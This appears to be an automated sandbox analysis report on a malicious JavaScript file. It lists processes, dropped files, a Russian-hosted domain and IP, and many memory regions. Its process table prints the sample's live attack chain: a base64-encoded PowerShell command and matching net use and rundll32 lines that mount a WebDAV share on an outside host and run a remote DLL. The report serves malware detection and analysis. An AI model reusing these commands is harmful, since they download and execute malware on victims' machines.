Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
19513932819732138.js
|
ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ee1zy5cc.24l.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hj5xobu1.tq3.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\19513932819732138.js"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQAxADAANgAxADEAOAAxADAAMgAyADQAMQA3ADgALgBkAGwAbAAsAEUAbgB0AHIAeQA=
|
|
|
|
C:\Windows\System32\rundll32.exe
|
"C:\Windows\system32\rundll32.exe" \\endpointexperiment.com@8888\davwwwroot\110611810224178.dll,Entry
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\net.exe
|
"C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
endpointexperiment.com
|
94.159.113.48
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
94.159.113.48
|
endpointexperiment.com
|
Russian Federation
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1902E427000
|
heap
|
page read and write
|
||
|
1902E43A000
|
heap
|
page read and write
|
||
|
1902E420000
|
heap
|
page read and write
|
||
|
164AD8CD000
|
heap
|
page read and write
|
||
|
164AF7EB000
|
trusted library allocation
|
page read and write
|
||
|
1902E407000
|
heap
|
page read and write
|
||
|
7FFAACD60000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3A0000
|
unkown
|
page readonly
|
||
|
1902E43A000
|
heap
|
page read and write
|
||
|
164AFD08000
|
trusted library allocation
|
page read and write
|
||
|
1D405B70000
|
heap
|
page read and write
|
||
|
164AFCFC000
|
trusted library allocation
|
page read and write
|
||
|
1902E42F000
|
heap
|
page read and write
|
||
|
164AD907000
|
heap
|
page read and write
|
||
|
1902E407000
|
heap
|
page read and write
|
||
|
164AF2E0000
|
heap
|
page read and write
|
||
|
BE19FD000
|
stack
|
page read and write
|
||
|
1902E0B0000
|
heap
|
page read and write
|
||
|
1902E427000
|
heap
|
page read and write
|
||
|
1902E402000
|
heap
|
page read and write
|
||
|
164AD880000
|
heap
|
page read and write
|
||
|
1D4029B0000
|
heap
|
page read and write
|
||
|
BE1DFE000
|
stack
|
page read and write
|
||
|
1902C4F0000
|
heap
|
page read and write
|
||
|
21A7F670000
|
heap
|
page read and write
|
||
|
1902E416000
|
heap
|
page read and write
|
||
|
1902E416000
|
heap
|
page read and write
|
||
|
21A7F69B000
|
heap
|
page read and write
|
||
|
1902C6A0000
|
heap
|
page read and write
|
||
|
7FFAACBD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
164AF8D8000
|
trusted library allocation
|
page read and write
|
||
|
164C79A8000
|
heap
|
page read and write
|
||
|
7FFAACDB0000
|
trusted library allocation
|
page read and write
|
||
|
164AFCD4000
|
trusted library allocation
|
page read and write
|
||
|
1902E448000
|
heap
|
page read and write
|
||
|
1902E40C000
|
heap
|
page read and write
|
||
|
164AFC9E000
|
trusted library allocation
|
page read and write
|
||
|
1902C55F000
|
heap
|
page read and write
|
||
|
164C79F0000
|
heap
|
page read and write
|
||
|
1902E41F000
|
heap
|
page read and write
|
||
|
164C7929000
|
heap
|
page read and write
|
||
|
1D40298F000
|
heap
|
page read and write
|
||
|
21A7F900000
|
heap
|
page read and write
|
||
|
1902E43A000
|
heap
|
page read and write
|
||
|
1902C730000
|
heap
|
page read and write
|
||
|
1902E400000
|
heap
|
page read and write
|
||
|
164AF335000
|
heap
|
page read and write
|
||
|
1902E443000
|
heap
|
page read and write
|
||
|
1902E44C000
|
heap
|
page read and write
|
||
|
164AF2F0000
|
heap
|
page execute and read and write
|
||
|
164C7AD0000
|
heap
|
page read and write
|
||
|
7FFAACAB2000
|
trusted library allocation
|
page read and write
|
||
|
1902E40F000
|
heap
|
page read and write
|
||
|
164ADA85000
|
heap
|
page read and write
|
||
|
1902EF63000
|
heap
|
page read and write
|
||
|
7FFB1E3C2000
|
unkown
|
page readonly
|
||
|
1902E401000
|
heap
|
page read and write
|
||
|
6B22DFF000
|
stack
|
page read and write
|
||
|
1902E842000
|
heap
|
page read and write
|
||
|
1D402994000
|
heap
|
page read and write
|
||
|
21A7F65E000
|
heap
|
page read and write
|
||
|
164AF8EE000
|
trusted library allocation
|
page read and write
|
||
|
1902E434000
|
heap
|
page read and write
|
||
|
1902E43A000
|
heap
|
page read and write
|
||
|
164C78C6000
|
heap
|
page execute and read and write
|
||
|
1902C4B0000
|
heap
|
page read and write
|
||
|
6B227A4000
|
stack
|
page read and write
|
||
|
164AD892000
|
heap
|
page read and write
|
||
|
7FFAACC70000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACDA0000
|
trusted library allocation
|
page read and write
|
||
|
21A7F670000
|
heap
|
page read and write
|
||
|
164AF8EB000
|
trusted library allocation
|
page read and write
|
||
|
1D4029A4000
|
heap
|
page read and write
|
||
|
1D402994000
|
heap
|
page read and write
|
||
|
21A7F5F0000
|
heap
|
page read and write
|
||
|
7FFAACD70000
|
trusted library allocation
|
page read and write
|
||
|
164AF82F000
|
trusted library allocation
|
page read and write
|
||
|
21A7F68F000
|
heap
|
page read and write
|
||
|
1902C528000
|
heap
|
page read and write
|
||
|
164C790D000
|
heap
|
page read and write
|
||
|
1902E43A000
|
heap
|
page read and write
|
||
|
7FFB1E3B6000
|
unkown
|
page readonly
|
||
|
BE15A3000
|
stack
|
page read and write
|
||
|
164AD770000
|
heap
|
page read and write
|
||
|
1902E417000
|
heap
|
page read and write
|
||
|
6B22FFF000
|
stack
|
page read and write
|
||
|
164C79A0000
|
heap
|
page read and write
|
||
|
7FFAACB96000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB1E3C0000
|
unkown
|
page read and write
|
||
|
164ADA80000
|
heap
|
page read and write
|
||
|
1D4029B8000
|
heap
|
page read and write
|
||
|
1902E44B000
|
heap
|
page read and write
|
||
|
1D406470000
|
heap
|
page read and write
|
||
|
BE18FE000
|
stack
|
page read and write
|
||
|
1902E404000
|
heap
|
page read and write
|
||
|
21A7F66C000
|
heap
|
page read and write
|
||
|
867F47B000
|
stack
|
page read and write
|
||
|
6B22BFE000
|
stack
|
page read and write
|
||
|
1D402A70000
|
heap
|
page read and write
|
||
|
BE1A7E000
|
stack
|
page read and write
|
||
|
1D402AA4000
|
heap
|
page read and write
|
||
|
1902C73B000
|
heap
|
page read and write
|
||
|
1902E416000
|
heap
|
page read and write
|
||
|
7FFAACD30000
|
trusted library allocation
|
page read and write
|
||
|
1902E84C000
|
heap
|
page read and write
|
||
|
1902E574000
|
heap
|
page read and write
|
||
|
164AD8DF000
|
heap
|
page read and write
|
||
|
7DF430D90000
|
trusted library allocation
|
page execute and read and write
|
||
|
1902E427000
|
heap
|
page read and write
|
||
|
1D405B73000
|
heap
|
page read and write
|
||
|
164C7961000
|
heap
|
page read and write
|
||
|
BE0BDDA000
|
stack
|
page read and write
|
||
|
BE0C0FE000
|
stack
|
page read and write
|
||
|
164ADA10000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACCC0000
|
trusted library allocation
|
page read and write
|
||
|
BE15EE000
|
stack
|
page read and write
|
||
|
1D40299B000
|
heap
|
page read and write
|
||
|
1902E402000
|
heap
|
page read and write
|
||
|
7FFAACDD0000
|
trusted library allocation
|
page read and write
|
||
|
1D402987000
|
heap
|
page read and write
|
||
|
164AF7D1000
|
trusted library allocation
|
page read and write
|
||
|
164AD8BF000
|
heap
|
page read and write
|
||
|
1902C73D000
|
heap
|
page read and write
|
||
|
1902C560000
|
heap
|
page read and write
|
||
|
7FFAACCD0000
|
trusted library allocation
|
page read and write
|
||
|
1902C533000
|
heap
|
page read and write
|
||
|
BE1FFB000
|
stack
|
page read and write
|
||
|
164ADA30000
|
trusted library allocation
|
page read and write
|
||
|
164AD8C9000
|
heap
|
page read and write
|
||
|
BE1EFF000
|
stack
|
page read and write
|
||
|
1D4029B6000
|
heap
|
page read and write
|
||
|
1902E418000
|
heap
|
page read and write
|
||
|
164AF330000
|
heap
|
page read and write
|
||
|
1902E443000
|
heap
|
page read and write
|
||
|
7FFB1E3C2000
|
unkown
|
page readonly
|
||
|
7FFAACD00000
|
trusted library allocation
|
page read and write
|
||
|
164C790F000
|
heap
|
page read and write
|
||
|
21A7F65A000
|
heap
|
page read and write
|
||
|
7FFAACD50000
|
trusted library allocation
|
page read and write
|
||
|
1902E452000
|
heap
|
page read and write
|
||
|
21A7F510000
|
heap
|
page read and write
|
||
|
6B22EFE000
|
stack
|
page read and write
|
||
|
21A7F630000
|
heap
|
page read and write
|
||
|
164C78DA000
|
heap
|
page read and write
|
||
|
7FFB1E3C0000
|
unkown
|
page read and write
|
||
|
1902E427000
|
heap
|
page read and write
|
||
|
7FFB1E3B6000
|
unkown
|
page readonly
|
||
|
1902C533000
|
heap
|
page read and write
|
||
|
164AF929000
|
trusted library allocation
|
page read and write
|
||
|
1902E427000
|
heap
|
page read and write
|
||
|
7FFAACC61000
|
trusted library allocation
|
page read and write
|
||
|
21A7F6A5000
|
heap
|
page read and write
|
||
|
867F67C000
|
stack
|
page read and write
|
||
|
1D402970000
|
heap
|
page read and write
|
||
|
1902C73D000
|
heap
|
page read and write
|
||
|
7FFAACB70000
|
trusted library allocation
|
page execute and read and write
|
||
|
21A7F665000
|
heap
|
page read and write
|
||
|
1902C55F000
|
heap
|
page read and write
|
||
|
1902C73B000
|
heap
|
page read and write
|
||
|
1D40298B000
|
heap
|
page read and write
|
||
|
164AF7F3000
|
trusted library allocation
|
page read and write
|
||
|
164ADA20000
|
heap
|
page readonly
|
||
|
1D402AA0000
|
heap
|
page read and write
|
||
|
164AF8D4000
|
trusted library allocation
|
page read and write
|
||
|
164AFAEC000
|
trusted library allocation
|
page read and write
|
||
|
21A7F760000
|
remote allocation
|
page read and write
|
||
|
164C797C000
|
heap
|
page read and write
|
||
|
1D40299A000
|
heap
|
page read and write
|
||
|
164AD90D000
|
heap
|
page read and write
|
||
|
1902E413000
|
heap
|
page read and write
|
||
|
1902C533000
|
heap
|
page read and write
|
||
|
21A7F760000
|
remote allocation
|
page read and write
|
||
|
7FFAACD40000
|
trusted library allocation
|
page read and write
|
||
|
1902C51B000
|
heap
|
page read and write
|
||
|
164C79B2000
|
heap
|
page read and write
|
||
|
6B233FC000
|
stack
|
page read and write
|
||
|
7FFAACCA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21A7F665000
|
heap
|
page read and write
|
||
|
1D40299E000
|
heap
|
page read and write
|
||
|
21A7F904000
|
heap
|
page read and write
|
||
|
164AF817000
|
trusted library allocation
|
page read and write
|
||
|
1902EB16000
|
heap
|
page read and write
|
||
|
164C797F000
|
heap
|
page read and write
|
||
|
BE1BF9000
|
stack
|
page read and write
|
||
|
1D40299A000
|
heap
|
page read and write
|
||
|
7FFB1E3C5000
|
unkown
|
page readonly
|
||
|
1902E41B000
|
heap
|
page read and write
|
||
|
1902EB2A000
|
heap
|
page read and write
|
||
|
1902E427000
|
heap
|
page read and write
|
||
|
6B230FE000
|
stack
|
page read and write
|
||
|
1902E427000
|
heap
|
page read and write
|
||
|
1902C680000
|
heap
|
page read and write
|
||
|
7FFAACC6A000
|
trusted library allocation
|
page read and write
|
||
|
BE1CF8000
|
stack
|
page read and write
|
||
|
7FFB1E3A1000
|
unkown
|
page execute read
|
||
|
7FFAACD80000
|
trusted library allocation
|
page read and write
|
||
|
1D402AB0000
|
heap
|
page read and write
|
||
|
164AF8D1000
|
trusted library allocation
|
page read and write
|
||
|
1902C561000
|
heap
|
page read and write
|
||
|
7FFAACCB0000
|
trusted library allocation
|
page read and write
|
||
|
164AD850000
|
heap
|
page read and write
|
||
|
164AF8E8000
|
trusted library allocation
|
page read and write
|
||
|
164AF85E000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD20000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3C5000
|
unkown
|
page readonly
|
||
|
867F5FC000
|
stack
|
page read and write
|
||
|
1902E414000
|
heap
|
page read and write
|
||
|
1902E416000
|
heap
|
page read and write
|
||
|
164AD9B0000
|
heap
|
page read and write
|
||
|
BE1E7E000
|
stack
|
page read and write
|
||
|
1D402AAB000
|
heap
|
page read and write
|
||
|
7FFAACC92000
|
trusted library allocation
|
page read and write
|
||
|
1902E42C000
|
heap
|
page read and write
|
||
|
164AFC78000
|
trusted library allocation
|
page read and write
|
||
|
867F4FE000
|
stack
|
page read and write
|
||
|
7FFAACD10000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC80000
|
trusted library allocation
|
page execute and read and write
|
||
|
1902C517000
|
heap
|
page read and write
|
||
|
1902E44E000
|
heap
|
page read and write
|
||
|
1D4029B7000
|
heap
|
page read and write
|
||
|
7FFAACB60000
|
trusted library allocation
|
page read and write
|
||
|
21A7F760000
|
remote allocation
|
page read and write
|
||
|
1902C4C2000
|
heap
|
page read and write
|
||
|
BE1C77000
|
stack
|
page read and write
|
||
|
164AFB22000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD90000
|
trusted library allocation
|
page read and write
|
||
|
164BF7DF000
|
trusted library allocation
|
page read and write
|
||
|
21A7F610000
|
heap
|
page read and write
|
||
|
7FFB1E3A1000
|
unkown
|
page execute read
|
||
|
1902E40B000
|
heap
|
page read and write
|
||
|
1902E443000
|
heap
|
page read and write
|
||
|
6B231FD000
|
stack
|
page read and write
|
||
|
BE1D7B000
|
stack
|
page read and write
|
||
|
21A7F689000
|
heap
|
page read and write
|
||
|
164AF923000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACB66000
|
trusted library allocation
|
page read and write
|
||
|
BE1B7F000
|
stack
|
page read and write
|
||
|
1902E450000
|
heap
|
page read and write
|
||
|
7FFAACC50000
|
trusted library allocation
|
page read and write
|
||
|
164BF83F000
|
trusted library allocation
|
page read and write
|
||
|
164C78B0000
|
heap
|
page read and write
|
||
|
1D4043E0000
|
heap
|
page read and write
|
||
|
1902E43B000
|
heap
|
page read and write
|
||
|
BE1AFE000
|
stack
|
page read and write
|
||
|
7FFAACCE0000
|
trusted library allocation
|
page read and write
|
||
|
164AD9F0000
|
trusted library allocation
|
page read and write
|
||
|
1902C73D000
|
heap
|
page read and write
|
||
|
164C78D0000
|
heap
|
page read and write
|
||
|
1D40298B000
|
heap
|
page read and write
|
||
|
1902C735000
|
heap
|
page read and write
|
||
|
1D402977000
|
heap
|
page read and write
|
||
|
BE187E000
|
stack
|
page read and write
|
||
|
867F57E000
|
stack
|
page read and write
|
||
|
164C78C0000
|
heap
|
page execute and read and write
|
||
|
1902E43A000
|
heap
|
page read and write
|
||
|
164AD980000
|
heap
|
page read and write
|
||
|
7FFAACAB4000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACAB3000
|
trusted library allocation
|
page execute and read and write
|
||
|
164AF7C0000
|
heap
|
page execute and read and write
|
||
|
BE0C07E000
|
stack
|
page read and write
|
||
|
7FFAACDC0000
|
trusted library allocation
|
page read and write
|
||
|
1D405C70000
|
trusted library allocation
|
page read and write
|
||
|
BE1F7E000
|
stack
|
page read and write
|
||
|
7FFAACAC0000
|
trusted library allocation
|
page read and write
|
||
|
1902C490000
|
heap
|
page read and write
|
||
|
1D402990000
|
heap
|
page read and write
|
||
|
1902C529000
|
heap
|
page read and write
|
||
|
7FFAACCF0000
|
trusted library allocation
|
page read and write
|
||
|
6B22AFE000
|
stack
|
page read and write
|
||
|
BE197F000
|
stack
|
page read and write
|
||
|
BE1C7E000
|
stack
|
page read and write
|
||
|
1902E448000
|
heap
|
page read and write
|
||
|
21A7F638000
|
heap
|
page read and write
|
||
|
164BF7D1000
|
trusted library allocation
|
page read and write
|
||
|
1902E416000
|
heap
|
page read and write
|
||
|
164AF8E5000
|
trusted library allocation
|
page read and write
|
||
|
1902E447000
|
heap
|
page read and write
|
||
|
1D402890000
|
heap
|
page read and write
|
||
|
164AD8C5000
|
heap
|
page read and write
|
||
|
7FFB1E3A0000
|
unkown
|
page readonly
|
||
|
1902E402000
|
heap
|
page read and write
|
||
|
1902E416000
|
heap
|
page read and write
|
||
|
1902E410000
|
heap
|
page read and write
|
||
|
1902C4B7000
|
heap
|
page read and write
|
||
|
7FFAACABD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1902E427000
|
heap
|
page read and write
|
||
|
1902E437000
|
heap
|
page read and write
|
There are 278 hidden memdumps, click here to show them.